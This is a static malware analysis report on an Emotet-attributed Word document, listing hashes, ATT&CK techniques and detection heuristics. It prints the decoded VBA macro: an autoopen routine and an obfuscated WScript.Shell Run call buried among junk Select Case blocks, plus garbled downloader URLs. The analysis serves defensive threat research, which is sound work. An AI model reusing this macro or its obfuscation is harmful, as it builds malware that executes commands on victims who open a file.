Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4cea979e184be810…

MALICIOUS

Office (OLE)

Size: 104.2 KB
Created: 2019-01-14 17:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: e5feda5425b94ccaa9a899138738c487
SHA-1: 296a820ab246bc0df434de5d43876ecfd44f9fa7
SHA-256: 4cea979e184be810766bd5aeebb77c49d656ffe078b29151c0e50b5c28d9ac2e
Risk Score: 290

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros with an autoopen function, a common technique for Emotet. The macros use WScript.Shell and CreateObject, indicating an intent to execute commands or download additional payloads. The ClamAV detection explicitly names Emotet, further supporting the family attribution. The embedded URLs are likely used for command and control or payload delivery.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10022072-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
          End Select
    TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
       Select Case onlineT
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
          End Select
    TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
       Select Case onlineT
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "CheckingAccountk"
    Sub autoopen()
    Utahh = synthesizeu - backendj
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://r]_-bet]$.om/ · In document text (OLE body)
    • http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e# · In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main · In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8182 bytes
SHA-256: 6faed8387958aab2afbbb17367611b5e39fc0c196b2c96446083cd881025259e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StreamlinedS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "PNGa"
Function IsleE()
On Error Resume Next
   Select Case OpenarchitectedG
         Case 427
HandcraftedL = Adaptiveb
            DigitizedW = CDate(GenericPlasticComputeri)
            FantasticP = seizeu
            Viao = Sgn(Softo)
         Case 438
            utilizeH = 799
            navigateu = CDbl(585)
Forwardd = UsercentricS
            orchidE = Sin(Grovesq)
         Case 390
matrixj = Connecticutr
            bleedingedgeh = Fix(moratoriumW)
Fordi = GenericGraniteSausagesH
            supplychainsE = Round(7)
            HomeLoanAccountD = Refinedw
      End Select
   Select Case MayotteP
         Case 409
Divisionz = paymentV
            MetricsV = CDate(SDDX)
            bandwidthw = marketsT
            channelsn = Sgn(PracticalSoftPantso)
         Case 74
            magneticj = 113
            processimprovementi = CDbl(739)
solidstatej = Expresswayz
            RusticRubberTowelsK = Sin(CanadianDollarf)
         Case 429
bestofbreedW = violetv
            realtimei = Fix(MississippiL)
BuckinghamshireJ = OrganicE
            analyzingl = Round(106)
            UnbrandedX = overridingS
      End Select
   Select Case HawaiiI
         Case 167
ROIq = backupK
            Producerw = CDate(Gorgeousz)
            programL = OptimizationC
            Illinoisv = Sgn(paymentT)
         Case 535
            RusticL = 382
            extranetX = CDbl(447)
WebE = whiteU
            Steeli = Sin(multibytei)
         Case 244
Buckinghamshires = SaoTomeandPrincipez
            U3rdgeneration25 = Fix(TastyPlasticComputerW)
Directm = IncrediblePlasticCarE
            LicensedMetalShirtZ = Round(717)
            Granitel = invoiceF
      End Select
   Select Case ToolsE
         Case 585
Licensedz = Balancedj
            Orchestratorc = CDate(Drivek)
            Frozenz = FrozenY
            Coordinatorw = Sgn(cardf)
         Case 90
            HomeLoanAccountL = 936
            systemB = CDbl(795)
IntelligentPlasticShirto = CreditCardAccountH
            SCSIP = Sin(corej)
         Case 292
NewMexicoB = OvalD
            moratoriumf = Fix(syndicateS)
Intelligenti = LandX
            depositv = Round(823)
            AutoLoanAccountZ = bypassw
      End Select
TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
   Select Case onlineT
         Case 554
distributedD = Cottond
            HandcraftedWoodenSaladT = CDate(PracticalMetalChickenr)
            frictionlessC = Capet
            InvestorN = Sgn(violetc)
         Case 594
            Marketingd = 342
            GorgeousSoftFishD = CDbl(560)
technologiesp = BahtR
            monetizep = Sin(NewTaiwanDollarU)
         Case 992
Locksq = BulgarianLevm
            productP = Fix(Gardensa)
AGPP = contingencyt
            ebusinessO = Round(359)
            primaryL = paymentD
      End Select
   Select Case Analystu
         Case 826
GBQ = nextgenerationH
            helpdeskE = CDate(DeveloperT)
            scalabled = Designerp
            sexyN = Sgn(CreditCardAccountR)
         Case 474
            HandmadeO = 826
            copyX = CDbl(472)
databasek = Configurationb
            TrailP = Sin(BuckinghamshireW)
         Case 428
GraniteU = UnbrandedConcreteSaladr
            ShoesSportsd = Fix(budgetarymanagementz)
revolutionizeu = Internationalj
            RAMv = Round(200)
            LicensedSteelHata = explicitW
      End Select
   Select Case depositt
         Case 718
infomediariesi = VirginIslandsUSF
            Futureu = CDate(emarketss)
            Optimizationt = stickyS
            Specialistp = Sgn(calculatingl)
         Case 229
            HomeLoanAccountL = 659
            indigoY = CDbl(58)
matricesH = withdrawalJ
            ForgeM = Sin(TunnelM)
         Case 822
RusticConcreteKeyboardn = LicensedFreshTowelsR
            backgroundv = Fix(CheckingAccountt)
SolutionsD = SingaporeDollarb
            workforcep = Round(347)
            Avonn = GardensX
      End Select
   Select Case Pennsylvaniat
         Case 821
bypassingJ = frictionlessJ
            IndustrialComputersHealthQ = CDate(multibyteb)
            GuineaBissauo = streamlineA
            MoneyMarketAccountj = Sgn(InternationalE)
         Case 960
            ArmeniaB = 542
            overridingB = CDbl(108)
CheckingAccountR = AutoLoanAccountH
            webreadinessz = Sin(UAEDirhamG)
         Case 532
Woodens = compressF
            withdrawalJ = Fix(AutoLoanAccountE)
copyingW = Covem
            FaroeIslandsW = Round(824)
            auxiliaryE = onlineT
      End Select
End Function


Attribute VB_Name = "CheckingAccountk"
Sub autoopen()
Utahh = synthesizeu - backendj
Niuep = connectingM - StationE
Distributeda = IntelligentGraniteBallG - relationshipsA
ImplementationU = virtualw - XSSt
Practicalr = copym - tertiaryA
IsleE
DominicaQ = Georgias - RusticSoftKeyboardP
WallT = violetW - Turnpikei
Avonw = compressingB - MoneyMarketAccountU
SDDZ = FantasticSteelShoesp - opticalf
ErgonomicFreshHatw = OptimizedI - accessm
End Sub

Attribute VB_Name = "PersonalLoanAccountV"

Attribute VB_Name = "Plasticc"

Attribute VB_Name = "EgyptM"

Attribute VB_Name = "UsabilityX"

Attribute VB_Name = "ClothingIndustrialW"

Attribute VB_Name = "Cambridgeshiren"

Attribute VB_Name = "Lodgef"

Attribute VB_Name = "PalladiumI"

Attribute VB_Name = "GamesElectronicsw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AwesomePlasticSaladf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Granitef"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HandcraftedN"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "reds"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "LodgeG"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Cambridgeshirer"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False